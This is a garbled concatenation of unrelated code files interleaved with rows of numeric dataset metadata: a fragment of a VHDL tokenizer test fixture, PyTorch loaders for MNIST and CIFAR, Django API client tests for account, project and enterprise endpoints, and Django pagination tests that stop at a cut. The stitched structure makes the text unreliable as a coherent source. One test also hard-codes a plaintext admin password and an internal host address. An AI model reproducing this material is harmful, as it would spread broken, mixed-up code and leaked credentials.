	NOTE(review): ``code`` ends with ``end entity e;`` but the tokenStream
	expects ``(WordToken, "a")`` and omits the final LinebreakToken — confirm
	whether this fixture is stale. blockStream still lists ``generic (``
	although ``code`` says ``gen (``; presumably unused because this class
	uses BlockSequenceWithParserError — verify.
	"""
	code = dedent("""\
		entity e is
			gen (
				G : integer
			;
		end entity e;
		""")
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(SpaceToken, " "),
			(WordToken, "is"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(WordToken, "gen"),
			(SpaceToken, " "),
			(CharacterToken, "("),
			(LinebreakToken, None),
			(IndentationToken, "\t\t"),
			(WordToken, "G"),
			(SpaceToken, " "),
			(CharacterToken, ":"),
			(SpaceToken, " "),
			(WordToken, "integer"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(CharacterToken, ";"),
			(LinebreakToken, None),
			(WordToken, "end"),
			(SpaceToken, " "),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "a"),
			(CharacterToken, ";"),
			(EndOfDocumentToken, None)
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),
			(Entity.NameBlock, "entity e is"),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t"),
			(GenericList.OpenBlock, "generic ("),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t\t"),
			(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
			(LinebreakBlock, "\n"),
			(GenericList.GenericListInterfaceConstantBlock, "\t"),
			(GenericList.CloseBlock, ");"),
			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "end entity e;"),
			(LinebreakBlock, "\n"),
			(EndOfDocumentBlock, None)
		]
	)
| 33.923577
| 203
| 0.521306
| 1,318
| 20,863
| 8.213202
| 0.076631
| 0.108822
| 0.024942
| 0.045635
| 0.897644
| 0.880647
| 0.863557
| 0.842217
| 0.816628
| 0.772656
| 0
| 0.000072
| 0.331352
| 20,863
| 614
| 204
| 33.978827
| 0.775914
| 0.023151
| 0
| 0.795139
| 0
| 0
| 0.08579
| 0.001679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001736
| false
| 0
| 0.013889
| 0
| 0.119792
| 0.003472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a609833fb477745632f41fb6dd3c6fb6a9b2167f
| 6,731
|
py
|
Python
|
data_loader/data_loaders.py
|
alexcdot/csc-2541-project
|
140ea8cdcfe5d2aee732dc457b99abda3f8457a9
|
[
"MIT"
] | 2
|
2022-03-19T04:16:41.000Z
|
2022-03-20T20:10:18.000Z
|
data_loader/data_loaders.py
|
alexcdot/csc-2541-project
|
140ea8cdcfe5d2aee732dc457b99abda3f8457a9
|
[
"MIT"
] | 1
|
2022-03-21T09:04:09.000Z
|
2022-03-21T09:04:09.000Z
|
data_loader/data_loaders.py
|
alexcdot/csc-2541-project
|
140ea8cdcfe5d2aee732dc457b99abda3f8457a9
|
[
"MIT"
] | null | null | null |
from torchvision import datasets, transforms
from base import BaseDataLoader
from typing import Optional
import torch
from .wrapped_datasets import CIFAR10WithIndex, CIFAR100WithIndex
import os
import numpy as np
import math
class MnistDataLoader(BaseDataLoader):
    """
    MNIST data loading demo using BaseDataLoader.

    Builds a train-time (flip + normalize) or eval-time (normalize only)
    transform pipeline and downloads MNIST into ``data_dir``.

    NOTE(review): the ``el2n_*`` parameters are accepted but never used in
    this class (unlike CIFAR10DataLoader) — confirm whether EL2N subsampling
    was intended for MNIST as well.
    """
    def __init__(self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1, training=True, train_subsample=1.0,
                 el2n_subsample=False, el2n_percent_lb=None, el2n_percent_ub=None,
                 el2n_avg_num=None, el2n_src=None, el2n_epoch=None,
                 ):
        if training:
            # NOTE(review): RandomHorizontalFlip is unusual for digit images
            # (mirroring changes digit identity) — confirm intended.
            trsfm = transforms.Compose([
                transforms.RandomHorizontalFlip(),
                transforms.ToTensor(),
                transforms.Normalize((0.1307,), (0.3081,))
            ])
        else:
            # Evaluation pipeline: no augmentation, same normalization constants.
            trsfm = transforms.Compose([
                transforms.ToTensor(),
                transforms.Normalize((0.1307,), (0.3081,))
            ])
        self.data_dir = data_dir
        self.dataset = datasets.MNIST(self.data_dir, train=training, download=True, transform=trsfm)
        super().__init__(self.dataset, batch_size, shuffle, validation_split, num_workers,
                         training=training, train_subsample=train_subsample)
class CIFAR10DataLoader(BaseDataLoader):
    """
    CIFAR10 data loading demo using BaseDataLoader.

    Supports optional EL2N-score-based example selection (``el2n_*`` args)
    and datasets that also yield the sample index (``return_index=True``).
    """
    def __init__(
        self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1,
        training=True, train_subsample=1.0, train_idx=None, train_idx_file=None, valid_idx_file=None,
        return_index=False,
        el2n_subsample=False, el2n_percent_lb=None, el2n_percent_ub=None,
        el2n_avg_num=None, el2n_src=None, el2n_epoch=None,
    ):
        # ``el2n_indices`` is not defined in this class — presumably inherited
        # from BaseDataLoader; appears to return None when EL2N selection is
        # disabled/unavailable (verify in base class).
        el2n_indices = self.el2n_indices(el2n_subsample, el2n_percent_lb, el2n_percent_ub,
                                         el2n_avg_num, el2n_src, el2n_epoch)
        if el2n_indices is not None:
            # EL2N selection and an explicit train_idx are mutually exclusive.
            assert train_idx is None, \
                "el2n_indices can be successfully retrieved from given request, " \
                "train_idx cannot be specified at the same time"
            train_idx = el2n_indices
            train_idx_file = None
        if training:
            # Standard CIFAR10 training augmentation + per-channel normalization.
            trsfm = transforms.Compose([
                transforms.RandomCrop(32, padding=4),
                transforms.RandomHorizontalFlip(),
                transforms.ToTensor(),
                transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))
            ])
        else:
            trsfm = transforms.Compose([
                transforms.ToTensor(),
                transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))
            ])
        self.data_dir = data_dir
        self.return_index = return_index
        if self.return_index:
            # Wrapped dataset also yields the example index with each sample.
            self.dataset = CIFAR10WithIndex(self.data_dir, train=training, download=True, transform=trsfm)
        else:
            self.dataset = datasets.CIFAR10(self.data_dir, train=training, download=True, transform=trsfm)
        super().__init__(
            self.dataset, batch_size, shuffle, validation_split, num_workers,
            training=training, train_subsample=train_subsample, train_idx=train_idx,
            train_idx_file=train_idx_file, valid_idx_file=valid_idx_file
        )
    @classmethod
    def from_loader_and_data_subset(
        cls,
        dataloader,
        shuffle: Optional[bool]=None,
        training: Optional[bool]=None,
        train_idx: Optional[torch.Tensor]=None,
        return_index: Optional[bool]=None
    ):
        # Alternate constructor: clone an existing loader's configuration,
        # overriding only the arguments explicitly provided (non-None).
        return cls(
            dataloader.data_dir,
            dataloader.batch_size,
            shuffle if shuffle is not None else dataloader.shuffle,
            dataloader.validation_split,
            dataloader.num_workers,
            training=training if training is not None else dataloader.training,
            train_subsample=dataloader.train_subsample,
            train_idx=train_idx if train_idx is not None else dataloader.train_idx,
            valid_idx_file=dataloader.valid_idx_file,
            return_index=return_index if return_index is not None else dataloader.return_index
        )
class CIFAR100DataLoader(BaseDataLoader):
    """
    CIFAR100 data loading demo using BaseDataLoader.

    Supports optional EL2N-score-based example selection (``el2n_*`` args)
    and datasets that also yield the sample index (``return_index=True``).
    """
    def __init__(
        self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1,
        training=True, train_subsample=1.0, train_idx=None, train_idx_file=None, valid_idx_file=None,
        return_index=False,
        el2n_subsample=False, el2n_percent_lb=None, el2n_percent_ub=None,
        el2n_avg_num=None, el2n_src=None, el2n_epoch=None,
    ):
        # CONSISTENCY FIX: the el2n_* arguments were accepted but silently
        # ignored here, while CIFAR10DataLoader honors them. Mirror that
        # logic so both loaders behave the same (el2n_indices is provided by
        # the shared base, as in CIFAR10DataLoader).
        el2n_indices = self.el2n_indices(el2n_subsample, el2n_percent_lb, el2n_percent_ub,
                                         el2n_avg_num, el2n_src, el2n_epoch)
        if el2n_indices is not None:
            # EL2N selection and an explicit train_idx are mutually exclusive.
            assert train_idx is None, \
                "el2n_indices can be successfully retrieved from given request, " \
                "train_idx cannot be specified at the same time"
            train_idx = el2n_indices
            train_idx_file = None
        if training:
            # Standard CIFAR100 training augmentation + per-channel normalization.
            trsfm = transforms.Compose([
                transforms.RandomCrop(32, padding=4),
                transforms.RandomHorizontalFlip(),
                transforms.ToTensor(),
                transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761))
            ])
        else:
            trsfm = transforms.Compose([
                transforms.ToTensor(),
                transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761))
            ])
        self.data_dir = data_dir
        self.return_index = return_index
        if self.return_index:
            # Wrapped dataset also yields the example index with each sample.
            self.dataset = CIFAR100WithIndex(self.data_dir, train=training, download=True, transform=trsfm)
        else:
            self.dataset = datasets.CIFAR100(self.data_dir, train=training, download=True, transform=trsfm)
        super().__init__(
            self.dataset, batch_size, shuffle, validation_split, num_workers,
            training=training, train_subsample=train_subsample, train_idx=train_idx,
            train_idx_file=train_idx_file, valid_idx_file=valid_idx_file
        )
    @classmethod
    def from_loader_and_data_subset(
        cls,
        dataloader,
        shuffle: Optional[bool]=None,
        training: Optional[bool]=None,
        train_idx: Optional[torch.Tensor]=None,
        return_index: Optional[bool]=None
    ):
        """Clone an existing loader's configuration, overriding only the
        explicitly provided (non-None) arguments."""
        return cls(
            dataloader.data_dir,
            dataloader.batch_size,
            shuffle if shuffle is not None else dataloader.shuffle,
            dataloader.validation_split,
            dataloader.num_workers,
            training=training if training is not None else dataloader.training,
            train_subsample=dataloader.train_subsample,
            train_idx=train_idx if train_idx is not None else dataloader.train_idx,
            valid_idx_file=dataloader.valid_idx_file,
            return_index=return_index if return_index is not None else dataloader.return_index
        )
| 42.333333
| 131
| 0.638241
| 776
| 6,731
| 5.280928
| 0.145619
| 0.050756
| 0.029527
| 0.025378
| 0.843094
| 0.843094
| 0.837726
| 0.832845
| 0.81918
| 0.790874
| 0
| 0.042916
| 0.276482
| 6,731
| 158
| 132
| 42.601266
| 0.798563
| 0.020651
| 0
| 0.778571
| 0
| 0
| 0.016651
| 0
| 0
| 0
| 0
| 0
| 0.007143
| 1
| 0.035714
| false
| 0
| 0.057143
| 0.014286
| 0.128571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a647015537ad1cc61581dfca9c7ec96eddb816b5
| 15,881
|
py
|
Python
|
app/api_tests/test_account/test_views_account.py
|
21vcloud/Controller
|
63169d220f412330a22e3a2fe9964c73893d4e0f
|
[
"Apache-2.0"
] | null | null | null |
app/api_tests/test_account/test_views_account.py
|
21vcloud/Controller
|
63169d220f412330a22e3a2fe9964c73893d4e0f
|
[
"Apache-2.0"
] | null | null | null |
app/api_tests/test_account/test_views_account.py
|
21vcloud/Controller
|
63169d220f412330a22e3a2fe9964c73893d4e0f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Web Console Api Client
"""
import datetime
from django.test import TestCase
from BareMetalControllerBackend.conf.env import env_config
from common.api_request import RequestClient
from baremetal_service.repository import service_model as service_model
from baremetal_openstack import handler
class TestAccountClient(TestCase):
    """Exercises the account endpoints through ``RequestClient``.

    NOTE(review): method names lack the ``test_`` prefix, so the Django test
    runner does not collect them automatically — confirm this is intentional.
    """

    def setUp(self):
        # Client against the DEV account endpoint; alternative endpoints are
        # kept commented out for quick switching while debugging.
        self.infra_machine_client = RequestClient(
            # DEV
            endpoint=env_config.account_endpoint,
            # endpoint="http://124.251.110.196:9001/account/",
            # endpoint="http://127.0.0.1:8003/account/",
            # UAT
            # endpoint="http://124.251.110.196:8000/uat/account/",
            api_key="")

    def token_verify(self):
        """A token obtained from a fresh login verifies successfully."""
        response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "wei.panlong"}, method="GET")
        content = response_obj.content[0]
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": content.account, "password": content.password}, method="POST")
        response_obj = self.infra_machine_client.token_verify(
            dict_param={"token": login_response_obj.content.token}, method="GET")
        self.assertTrue(response_obj.is_ok)

    def token_verify_not_exit(self):
        """A corrupted token fails verification."""
        response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "wei.panlong"}, method="GET")
        content = response_obj.content[0]
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": content.account, "password": content.password}, method="POST")
        response_obj = self.infra_machine_client.token_verify(
            dict_param={"token": "123" + login_response_obj.content.token}, method="GET")
        self.assertFalse(response_obj.is_ok)

    def token_verify_not_timeout(self):
        """A token-shaped but unknown value fails verification."""
        response_obj = self.infra_machine_client.token_verify(
            dict_param={"token": "123123|1231231"}, method="GET")
        self.assertFalse(response_obj.is_ok)

    def register(self):
        """A unique, timestamped account name can be registered."""
        # Fix: dropped the redundant function-local ``import datetime``;
        # the module already imports it at the top.
        response_obj = self.infra_machine_client.register(
            dict_param={"account": "%s@21vianet.com" % datetime.datetime.now(), "password": "abcd-1234"}, method="POST")
        self.assertTrue(response_obj.is_ok)

    def register_fail(self):
        """Registering an already-taken account fails."""
        response_obj = self.infra_machine_client.register(
            dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
        self.assertFalse(response_obj.is_ok)

    def login(self):
        """A known account can log in with its stored password."""
        response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "wei"}, method="GET")
        content = response_obj.content[0]
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": content.account, "password": content.password}, method="POST")
        # Bug fix: assert on the login response; the original asserted on the
        # keyword-query response, so a failed login would still pass.
        self.assertTrue(login_response_obj.is_ok)

    def login_fail(self):
        """Logging in with a wrong password fails."""
        response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "wei.panlong"}, method="GET")
        content = response_obj.content[0]
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": content.account, "password": content.password + '1'}, method="POST")
        self.assertFalse(login_response_obj.is_ok)

    def login_fail_for_account(self):
        """Logging in with a non-existent account fails."""
        response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "wei.panlong"}, method="GET")
        content = response_obj.content[0]
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": content.account + '1', "password": content.password}, method="POST")
        self.assertFalse(login_response_obj.is_ok)

    def logout(self):
        """A logged-in session can be logged out with its token."""
        response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "wei.panlong"}, method="GET")
        content = response_obj.content[0]
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": content.account, "password": content.password}, method="POST")
        logout_response_obj = self.infra_machine_client.logout(
            dict_param={"account": content.account, "password": content.password}, method="POST",
            token=login_response_obj.content.token)
        self.assertTrue(logout_response_obj.is_ok)

    def update_password(self):
        """Requesting a password reset for a known email succeeds."""
        response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "wei.panlong"}, method="GET")
        content = response_obj.content[0]
        update_response_obj = self.infra_machine_client.update_password(
            dict_param={"email": content.account}, method="POST")
        self.assertTrue(update_response_obj.is_ok)

    def confirm_update_password(self):
        """The reset code returned by update_password confirms a new password."""
        response_obj_password = self.infra_machine_client.update_password(
            dict_param={"email": "wei.panlong@21vianet.com"}, method="POST")
        response_obj = self.infra_machine_client.confirm_update_password(
            dict_param={"email": "wei.panlong@21vianet.com", "code": response_obj_password.content.code,
                        "new_password": "abcd-1234"}, method="POST")
        self.assertTrue(response_obj.is_ok)

    def query_account_info_by_keywords(self):
        """An authenticated keyword query returns ok."""
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
        response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
        self.assertTrue(response_obj.is_ok)

    def user_info_update(self):
        """A fetched user record (minus ORM bookkeeping) can be re-submitted."""
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
        user_response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
        dict_param = user_response_obj.json["content"][0]
        # "_state" is Django ORM bookkeeping, not part of the API payload.
        dict_param.pop("_state")
        response_obj = self.infra_machine_client.user_info_update(dict_param=dict_param, method="POST")
        self.assertTrue(response_obj.is_ok)

    def user_info_update_user_id_error(self):
        """Updating with a bogus user id fails."""
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
        user_response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
        dict_param = user_response_obj.json["content"][0]
        dict_param.pop("_state")
        dict_param["id"] = "1231123123"
        response_obj = self.infra_machine_client.user_info_update(dict_param=dict_param, method="POST")
        self.assertFalse(response_obj.is_ok)

    def user_info_update_user_id_not_exit(self):
        """Updating without any user id fails."""
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
        user_response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
        dict_param = user_response_obj.json["content"][0]
        dict_param.pop("_state")
        dict_param.pop("id")
        response_obj = self.infra_machine_client.user_info_update(dict_param=dict_param, method="POST")
        self.assertFalse(response_obj.is_ok)

    def user_info_update_param_error(self):
        """Submitting the raw record (with "_state" still present) fails."""
        login_response_obj = self.infra_machine_client.login(
            dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
        user_response_obj = self.infra_machine_client.query_account_info_by_keywords(
            dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
        dict_param = user_response_obj.json["content"][0]
        response_obj = self.infra_machine_client.user_info_update(dict_param=dict_param, method="POST")
        self.assertFalse(response_obj.is_ok)

    def update_phone(self):
        """Not implemented; sample payloads kept from the original author.

        {
        "account_id": "5cc1afe1acaea162074f0761",
        "phone_number": "15010824265"
        }
        {
        "account_id": "5cc1afe1acaea162074f07611",
        "phone_number": "15010824266"
        }{
        "account_id": "5cc1afe1acaea162074f0761",
        "phone_number": "15010824266"
        }{
        "account_id": "5cc1afe1acaea162074f0761",
        "phone_number": "18101029681",
        "new_phone_number": "15010824266",
        "code": "891547"
        }
        :return:
        """
        pass
class TestAccountProjectClient(TestCase):
    """Checks for the account-project endpoints."""

    def setUp(self):
        self.infra_machine_client = RequestClient(
            # DEV
            endpoint=env_config.account_project_endpoint,
            # endpoint="http://124.251.110.196:9001/account/",
            # UAT
            # endpoint="http://124.251.110.196:8000/uat/account/",
            api_key="")

    def project_create(self):
        """A project with a unique timestamped name can be created."""
        payload = {
            "account_list": ["5cc1afe1acaea162074f0761"],
            "project_name": "%s" % datetime.datetime.now(),
            "description": "string",
            "status": "active",
            "create_at": "2019-04-29T03:47:14.025Z"
        }
        result = self.infra_machine_client.project_create(dict_param=payload, method="POST")
        self.assertTrue(result.is_ok)

    def project_create_double_project(self):
        """Re-creating an already existing project record is rejected."""
        lookup = self.infra_machine_client.project_info_query_by_keywords(
            dict_param={"keywords": "2019"}, method="GET")
        existing = lookup.json["content"][0]
        # Strip ORM bookkeeping fields before resubmitting the record.
        existing.pop("_state")
        existing.pop("update_at")
        result = self.infra_machine_client.project_create(dict_param=existing, method="POST")
        self.assertFalse(result.is_ok)

    def project_create_no_account(self):
        """Creation without an account_list is still accepted."""
        payload = {
            "project_name": "%s" % datetime.datetime.now(),
            "description": "string",
            "status": "active",
            "create_at": datetime.datetime.now()
        }
        result = self.infra_machine_client.project_create(dict_param=payload, method="POST")
        self.assertTrue(result.is_ok)

    def project_update(self):
        """An existing project accepts an update payload."""
        payload = {
            "id": "5cc6a02dac578ba9e7b4624a",
            "account_list": [
                "5cc1832aab85c31d2a7b975e", "5cc1832aab85c31d2a7b975e"
            ],
            "project_name": "Melon Test",
            "update_at": "2019-04-29T07:13:25.049Z",
        }
        result = self.infra_machine_client.project_update(dict_param=payload, method="POST")
        self.assertTrue(result.is_ok)

    def project_update_no_proejct(self):
        """Updating a non-existent project id fails."""
        payload = {
            "id": "5cc6a02dac578ba9e7b4624a123",
            "account_list": [
                "5cc1832aab85c31d2a7b975e",
            ],
            "project_name": "Melon Test",
            "update_at": "2019-04-29T07:13:25.049Z",
        }
        result = self.infra_machine_client.project_update(dict_param=payload, method="POST")
        self.assertFalse(result.is_ok)

    def project_info_query_by_keywords(self):
        """Keyword search returns ok for a matching term."""
        result = self.infra_machine_client.project_info_query_by_keywords(
            dict_param={"keywords": "Melon"}, method="GET")
        self.assertTrue(result.is_ok)

    def project_info_query_by_no_keywords(self):
        """An empty keyword still yields a successful response."""
        result = self.infra_machine_client.project_info_query_by_keywords(
            dict_param={"keywords": ""}, method="GET")
        self.assertTrue(result.is_ok)

    def project_info_query_by_no_results(self):
        """A keyword that matches nothing still yields a successful response."""
        result = self.infra_machine_client.project_info_query_by_keywords(
            dict_param={"keywords": str(datetime.datetime.now())}, method="GET")
        self.assertTrue(result.is_ok)
class TestAccountEnterpriseClient(TestCase):
    """Checks for the enterprise endpoints and the openstack session call.

    NOTE(review): method names lack the ``test_`` prefix, so the test runner
    does not collect them automatically — confirm this is intentional.
    """

    def setUp(self):
        # Client pinned to a hard-coded internal host; the env-config
        # endpoint is commented out, so this suite only works on that network.
        self.infra_machine_client = RequestClient(
            # DEV
            # endpoint=env_config.account_enterprise_endpoint,
            # endpoint="http://124.251.110.196:9001/account/",
            endpoint="http://172.16.107.71:8000/auth/",
            # UAT
            # endpoint="http://124.251.110.196:8000/uat/account/",
            api_key="")

    def enterprise_create(self):
        # Timestamped enterprise_name keeps repeated runs unique.
        dict_param = {
            "enterprise_name": str(datetime.datetime.now()),
            "abbreviation": "lenovo",
            "description": "联想世纪",
            "industry1": "IT服务",
            "industry2": "实际",
            "location": "北京",
            "sales": "魏盼龙",
            "system_id": "1232233456789",
            "create_at": "2019-04-29T08:39:27.751Z"
        }
        response_obj = self.infra_machine_client.enterprise_create(dict_param=dict_param, method="POST")
        self.assertTrue(response_obj.is_ok)

    def enterprise_create_repeat_name(self):
        # Reusing a fixed enterprise_name is expected to be rejected.
        dict_param = {
            "enterprise_name": "北京联想",
            "abbreviation": "lenovo",
            "description": "联想世纪",
            "industry1": "IT服务",
            "industry2": "实际",
            "location": "北京",
            "sales": "魏盼龙",
            "system_id": "1232233456789"
        }
        response_obj = self.infra_machine_client.enterprise_create(dict_param=dict_param, method="POST")
        self.assertFalse(response_obj.is_ok)

    def enterprise_info_query_by_keywords(self):
        # Keyword search over enterprise records returns ok.
        dict_param = {
            "keywords": "2019"
        }
        response_obj = self.infra_machine_client.enterprise_info_query_by_keywords(dict_param=dict_param, method="GET")
        self.assertTrue(response_obj.is_ok)

    def enterprise_update(self):
        # Fetch an existing record, strip ORM bookkeeping fields, rename it,
        # and resubmit as an update.
        query_dict_param = {
            "keywords": "2019"
        }
        query_response_obj = self.infra_machine_client.enterprise_info_query_by_keywords(dict_param=query_dict_param,
                                                                                         method="GET")
        dict_param = query_response_obj.json["content"][0]
        dict_param.pop("_state")
        dict_param.pop("update_at")
        dict_param["enterprise_name"] = "wei_%s" % datetime.datetime.now()
        response_obj = self.infra_machine_client.enterprise_update(dict_param=dict_param, method="POST")
        self.assertTrue(response_obj.is_ok)

    def get_session(self):
        # SECURITY(review): plaintext admin credentials committed in source —
        # should be moved to configuration/secrets management.
        dict_param = {
            "username": "admin",
            "password": "ql21Fm7vPMAzbYJvKkf0MsDQj",
            "project_name": "admin",
            "project_domain_name": "default",
            "user_domain_name": "default",
            "region": "regionOne"
        }
        response_obj = self.infra_machine_client.get_session(dict_param=dict_param, method="POST")
        self.assertTrue(response_obj.is_ok)
class TestVpcs(TestCase):
    """Smoke test for the VPC CIDR lookup in the openstack handler."""

    def setUp(self):
        self.project_id = "7ae5a60714014778baddea703b85cd93"
        self.vpc_id = 448

    def test_get_vpcs_from_db(self):
        # Only checks that the lookup runs; nothing is asserted on the result.
        cidrs = handler.get_vpc_net_cidrs(self.vpc_id)
class TestServiceCreate(TestCase):
    # NOTE(review): ``service_create`` only rebuilds the client and performs
    # no request or assertion — it looks unfinished; confirm intent.
    def setUp(self):
        self.project_id = "7ae5a60714014778baddea703b85cd93"
        self.request_client = RequestClient(endpoint=env_config.service_volume_endpoint, api_key="")

    def service_create(self):
        self.request_client = RequestClient(endpoint=env_config.service_volume_endpoint, api_key="")
| 42.80593
| 120
| 0.660286
| 1,845
| 15,881
| 5.344715
| 0.100813
| 0.113782
| 0.087618
| 0.120475
| 0.850624
| 0.82953
| 0.809553
| 0.804482
| 0.766454
| 0.706318
| 0
| 0.045718
| 0.219067
| 15,881
| 370
| 121
| 42.921622
| 0.749395
| 0.054719
| 0
| 0.598566
| 0
| 0
| 0.136886
| 0.034989
| 0
| 0
| 0
| 0
| 0.103943
| 1
| 0.132616
| false
| 0.082437
| 0.02509
| 0
| 0.175627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a668a818ffc2f103adb24e9a69ee73d604fa5054
| 15,963
|
py
|
Python
|
tests/tests.py
|
nitely/django-infinite-scroll-pagination
|
c4a9b57539e6daaef95fb0f184b2bab906f15b96
|
[
"MIT"
] | 89
|
2015-01-08T14:07:17.000Z
|
2022-03-08T14:41:20.000Z
|
tests/tests.py
|
nitely/django-infinite-scroll-pagination
|
c4a9b57539e6daaef95fb0f184b2bab906f15b96
|
[
"MIT"
] | 10
|
2016-11-14T02:12:47.000Z
|
2022-01-28T01:56:27.000Z
|
tests/tests.py
|
nitely/django-infinite-scroll-pagination
|
c4a9b57539e6daaef95fb0f184b2bab906f15b96
|
[
"MIT"
] | 11
|
2015-02-19T17:35:05.000Z
|
2020-11-26T08:09:16.000Z
|
#-*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import json
import pytz
from django.test import TestCase, override_settings
from django.urls import reverse
from django.utils import timezone
from .models import Article
from infinite_scroll_pagination.paginator import SeekPaginator
from infinite_scroll_pagination import paginator as inf_paginator
from infinite_scroll_pagination import serializers
class PaginatorTest(TestCase):
    """Tests SeekPaginator slicing in both directions and sort orders."""

    def setUp(self):
        # 25 articles sharing one ``date`` but with strictly increasing
        # ``date_unique`` values, one second apart.
        date = timezone.now()
        for i in range(25):
            seconds = datetime.timedelta(seconds=i)
            Article.objects.create(title="%s" % i, date=date, date_unique=date + seconds)

    def test_paginator_prev_desc(self):
        # Seek backwards (PREV_PAGE) from record 20 over a unique desc field.
        articles = Article.objects.all().order_by("-date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page_2 = paginator.page(
            value=list(articles)[20].date_unique,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_1 = paginator.page(
            value=page_2[0].date_unique,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page_1), list(articles[:10]))

    def test_paginator_next_desc(self):
        # value=None requests the first page; each later page is keyed by the
        # last item of the previous one.
        articles = Article.objects.all().order_by("-date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page_1 = paginator.page(value=None)
        self.assertListEqual(list(page_1), list(articles[:10]))
        page_2 = paginator.page(value=page_1[-1].date_unique)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_3 = paginator.page(value=page_2[-1].date_unique)
        self.assertListEqual(list(page_3), list(articles[20:]))

    def test_paginator_prev_asc(self):
        # Same as prev_desc but with an ascending lookup field.
        articles = Article.objects.all().order_by("date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="date_unique")
        page_2 = paginator.page(
            value=list(articles)[20].date_unique,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_1 = paginator.page(
            value=page_2[0].date_unique,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page_1), list(articles[:10]))

    def test_paginator_next_asc(self):
        # Forward pagination over the ascending unique field.
        articles = Article.objects.all().order_by("date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="date_unique")
        page_1 = paginator.page(value=None)
        self.assertListEqual(list(page_1), list(articles[:10]))
        page_2 = paginator.page(value=page_1[-1].date_unique)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_3 = paginator.page(value=page_2[-1].date_unique)
        self.assertListEqual(list(page_3), list(articles[20:]))

    def test_paginator_prev_desc_non_unique(self):
